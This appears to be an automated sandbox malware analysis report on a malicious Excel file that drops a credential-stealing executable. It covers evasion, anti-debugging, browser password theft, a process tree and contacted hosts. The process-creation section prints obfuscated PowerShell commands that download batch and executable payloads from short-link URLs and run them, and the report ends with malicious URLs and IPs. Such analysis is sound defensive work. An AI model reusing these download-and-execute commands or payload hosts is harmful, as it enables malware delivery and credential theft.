Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2924 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2960 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3044 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DCD2 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_0043DCD2
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0045F42D FindFirstFileExW, 24_2_0045F42D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DCF2 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_0043DCF2
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DE3D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose, 24_2_0043DE3D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002AE08D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose, 24_2_002AE08D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002CF67D FindFirstFileExW, 24_2_002CF67D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002ADF22 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_002ADF22
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002ADF42 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_002ADF42
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00434AFC __EH_prolog,GetLogicalDriveStringsA, 24_2_00434AFC
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004365E1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 24_2_004365E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 0000000E.00000002.2143327246.000000000035B000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00446061 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00446061
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 24_2_00423778
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044663D mov eax, dword ptr fs:[00000030h] 24_2_0044663D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00459A7D mov eax, dword ptr fs:[00000030h] 24_2_00459A7D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00459A39 mov eax, dword ptr fs:[00000030h] 24_2_00459A39
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00459AAE mov eax, dword ptr fs:[00000030h] 24_2_00459AAE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00220083 push dword ptr fs:[00000030h] 24_2_00220083
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B688D mov eax, dword ptr fs:[00000030h] 24_2_002B688D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027092B mov eax, dword ptr fs:[00000030h] 24_2_0027092B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002C9C89 mov eax, dword ptr fs:[00000030h] 24_2_002C9C89
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002C9CFE mov eax, dword ptr fs:[00000030h] 24_2_002C9CFE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002C9CCD mov eax, dword ptr fs:[00000030h] 24_2_002C9CCD
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00270D90 mov eax, dword ptr fs:[00000030h] 24_2_00270D90
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00409290 __EH_prolog,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 24_2_00409290
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043FFB9 SetUnhandledExceptionFilter, 24_2_0043FFB9
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00446061 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00446061
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044017B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_0044017B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043FE57 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_0043FE57
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B00A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_002B00A7
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B62B1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_002B62B1
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B03CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_002B03CB

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 18,1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe'

Language, Device and Operating System Detection:

Yara detected Obfuscated Powershell
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\Documents\pd.bat, type: DROPPED
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043FC7B cpuid 24_2_0043FC7B
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,GetUserNameA,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,WaitForSingleObject,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 24_2_00425760
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_0046207E
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_00462033
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_00462119
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 24_2_004621A4
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_004623F7
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 24_2_0046251D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 24_2_004365E1
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_00458604
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_00462623
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 24_2_004626F2
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 24_2_00461D91
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_00457FD7
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_00461F8C
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_002C8227
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_002D2283
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_002D22CE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_002D2369
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 24_2_002D23F4
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_002D2647
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 24_2_002D276D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_002D2873
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_002C8854
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 24_2_002D2942
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 24_2_002D1FE1
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00440023 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 24_2_00440023
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00434BE4 GetUserNameA, 24_2_00434BE4
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043604A __EH_prolog,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor, 24_2_0043604A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 24_2_00423778
Source: C:\Users\user\AppData\Roaming\cr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 Blob

Stealing of Sensitive Information:

Contains functionality to steal Internet Explorer form passwords
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 24_2_0043472B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 24_2_002A497B
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\cr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\cr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Searches for user specific document files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\attrib.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\user\Documents
Behavior Graph:

Behavior Graph ID: 337274
Sample: ul9kpUwYel.xls
Startdate: 08/01/2021
Architecture: WINDOWS
Score: 100

Sample node (node 2): trashbininspector.fun; signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 10 other signatures

Process tree (numbers in parentheses are the graph's node IDs; the counts after a process name are the graph's own per-node counters):
  • EXCEL.EXE 86 29 (12); signatures: Obfuscated command line found; Document exploit detected (process start blacklist hit)
    • cmd.exe (15)
      • powershell.exe 7 (24)
        • cmd.exe (37); signatures: Obfuscated command line found
          • cmd.exe (42); signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
            • powershell.exe 8 (49); DNS/IP: cutt.ly; chebo.discountmonumentcenter.com 192.185.194.191, 49169, 80 UNIFIEDLAYER-AS-1US United States; dropped: C:\Users\user\AppData\Roaming\cr.exe, PE32
              • cr.exe 5 (53); DNS/IP: trashbininspector.fun 104.18.58.219, 443, 49176, 49177 CLOUDFLARENETUS United States; telete.in 195.201.225.248, 443, 49174 HETZNER-ASDE Germany; dropped: C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32; signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Contains functionality to steal Internet Explorer form passwords; Tries to harvest and steal browser information (history, passwords, etc)
          • cmd.exe (45)
          • mode.com (47)
    • cmd.exe (17); signatures: Obfuscated command line found
      • powershell.exe 16 10 (26); DNS/IP: cutt.ly 104.22.1.232, 443, 49165, 49168 CLOUDFLARENETUS United States; 37.46.150.139, 49167, 80 IWAYCH Moldova Republic of; dropped: C:\Users\user\Documents\pd.bat, ASCII
    • cmd.exe (20)
      • powershell.exe 6 (30); signatures: Powershell drops PE file
    • 2 other processes (22)
      • powershell.exe 7 (33)
        • attrib.exe (40)
      • powershell.exe 7 (35)

Contacted Public IPs

IP              | Domain  | Country             | ASN   | ASN Name            | Malicious
104.18.58.219   | unknown | United States       | 13335 | CLOUDFLARENETUS     | true
195.201.225.248 | unknown | Germany             | 24940 | HETZNER-ASDE        | false
192.185.194.191 | unknown | United States       | 46606 | UNIFIEDLAYER-AS-1US | false
37.46.150.139   | unknown | Moldova Republic of | 8758  | IWAYCH              | false
104.22.1.232    | unknown | United States       | 13335 | CLOUDFLARENETUS     | true

Contacted Domains

Name IP Active
cutt.ly 104.22.1.232 true
trashbininspector.fun 104.18.58.219 true
chebo.discountmonumentcenter.com 192.185.194.191 true
telete.in 195.201.225.248 true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://37.46.150.139/bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat | false | Avira URL Cloud: safe | unknown
http://chebo.discountmonumentcenter.com/vantuz_2021.exe | true | Avira URL Cloud: malware | unknown